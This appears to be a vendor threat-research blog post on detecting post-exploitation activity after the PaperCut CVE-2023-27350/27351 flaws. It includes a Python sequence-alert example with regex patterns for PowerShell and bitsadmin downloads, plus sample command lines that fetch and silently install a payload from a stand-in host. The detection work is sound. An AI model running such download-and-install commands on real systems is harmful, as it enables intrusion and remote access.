PaperCuts Don't Have to Be the Worst Type of Pain

Detection Strategies
A Piece of the Puzzle

While zero-day vulnerabilities are certainly a cause for concern, they represent only a small piece of the larger attack chain. Rather than concentrating solely on the exploitation stage, which changes frequently, it is more beneficial to focus on the rest of the chain, which comprises threat behaviors that are relatively more consistent. As defenders, we must therefore shift from worrying only about the vulnerability itself to paying more attention to the post-exploitation behaviors of threat actors. In this way, we can better understand the techniques and strategies attackers use and improve our ability to detect and respond to a broader range of threats, including those that leverage zero-day vulnerabilities. Among the latest vulnerabilities to be highlighted are CVE-2023-27350 and CVE-2023-27351 in PaperCut MF/NG, a print management software solution; they allow an authentication bypass, enabling remote code execution without requiring any authentication.

The proof-of-concept released by Zach Hanley at Horizon3 is a valuable aid in detecting the PaperCut vulnerabilities. However, our focus for threat detection is on understanding adversary behavior after the vulnerability is exploited: these tactics, techniques, and procedures (TTPs) are a constant staple of threat actor activity, whereas the way a single appliance or piece of software is exploited keeps changing. Researchers from Huntress have observed PaperCut servers being exploited to execute PowerShell commands that drop remote access software such as Atera and Syncro. Based on the registered infrastructure dropping the software, operators from the Clop ransomware gang are involved in exploiting PaperCut servers, raising concerns about potential ransomware attacks stemming from this exploit.

Finding the Path for Sequence-based Alerting

Although the observed activity is short and sweet, recognizing these patterns is crucial to comprehending adversary behavior and improving threat detection. By identifying the sequences of attack techniques, we better understand the attack and how to strengthen our defenses.

Attack Flow Illustration

Through the power of sequence-based alerting from the Anvilogic Forge, we can chain together the observed post-exploitation activity with threat identifiers from our detection armory to produce a threat scenario. Our atomic-level detections are important on their own for capturing specific techniques; when sequenced in a scenario, however, they tell a complete story. Creating a sequence-based alert from research and intelligence gathering enables us to readily operationalize our intel to defend against the latest threats, in addition to recognizing new patterns of threat behavior.

Anvilogic Threat Scenario: PS/BitsAdmin Downloads Payload for Remote Access
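
The scenario named above, as an added Python example (not Anvilogic's detection content): two atomic detections, a PowerShell/BitsAdmin download and remote access software such as Atera or Syncro, are chained into one alert when they occur in that order on the same host. The regex patterns, the 30-minute window, the host names and the sample events are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Atomic detections: assumed patterns written for this example.
ATOMIC = {
    "download": re.compile(
        r"(powershell(\.exe)?\b.*(invoke-webrequest|downloadfile|downloadstring)"
        r"|bitsadmin(\.exe)?\b.*/transfer)", re.I),
    "remote_access": re.compile(r"\b(atera|syncro)", re.I),
}
WINDOW = timedelta(minutes=30)  # assumed correlation window

# Constructed process-creation events: (timestamp, host, command line).
EVENTS = [
    ("2023-04-20T10:00:05", "print01", "powershell.exe -c Invoke-WebRequest "
     "http://example.invalid/setup.msi -OutFile C:\\Windows\\Temp\\setup.msi"),
    ("2023-04-20T10:02:40", "print01", "msiexec.exe /i C:\\Windows\\Temp\\setup.msi /qn"),
    ("2023-04-20T10:03:10", "print01", "AteraAgent.exe"),
    ("2023-04-20T11:00:00", "ws07", "Syncro.Service.exe"),  # no prior download
    ("2023-04-20T12:00:00", "ws09",
     "bitsadmin.exe /transfer job http://example.invalid/a.zip C:\\Temp\\a.zip"),
]

def atomic_hits(events):
    """Tag each event with the first atomic detection whose pattern matches."""
    hits = []
    for ts, host, cmd in events:
        for name, pattern in ATOMIC.items():
            if pattern.search(cmd):
                hits.append((datetime.fromisoformat(ts), host, name))
                break
    return sorted(hits)  # chronological order

def sequence_alerts(events, window=WINDOW):
    """Alert when 'download' is followed by 'remote_access' on one host in the window."""
    last_download = {}  # host -> time of most recent download hit
    alerts = []
    for ts, host, name in atomic_hits(events):
        if name == "download":
            last_download[host] = ts
        elif host in last_download and ts - last_download[host] <= window:
            alerts.append({"host": host, "download": last_download.pop(host),
                           "remote_access": ts})
    return alerts

if __name__ == "__main__":
    for alert in sequence_alerts(EVENTS):
        print(alert)
```

Only print01 produces a scenario alert; the lone remote access agent on ws07 and the lone BitsAdmin transfer on ws09 remain atomic hits, which shows how sequencing separates the full chain from routine administrative activity.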
Armor Up with a Fortified Detection Armory

Understanding threat behaviors means we don’t have to constantly worry about the one element of the chain that changes and can focus instead on the parts that remain constant. Threat detection provides a strong level of defense when armed with a library of adversary behaviors to detect malicious activity.
PaperCut has resolved vulnerabilities CVE-2023-27350 and CVE-2023-27351 through “PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later,” as stated in their latest security advisory.

About the Forge Author

Kevin Lo is a threat researcher for the Anvilogic Forge team, where he is responsible for threat research and intelligence.

Prior to Anvilogic, Kevin was a cybersecurity analyst at a US financial institution serving roles in digital forensics, cybersecurity operations, and detection engineering. Kevin currently resides in Albany, NY. He holds a Bachelor's degree from Syracuse University in Information Management & Technology with a concentration in Information Security. Kevin holds several cybersecurity certifications with GIAC and MITRE ATT&CK.
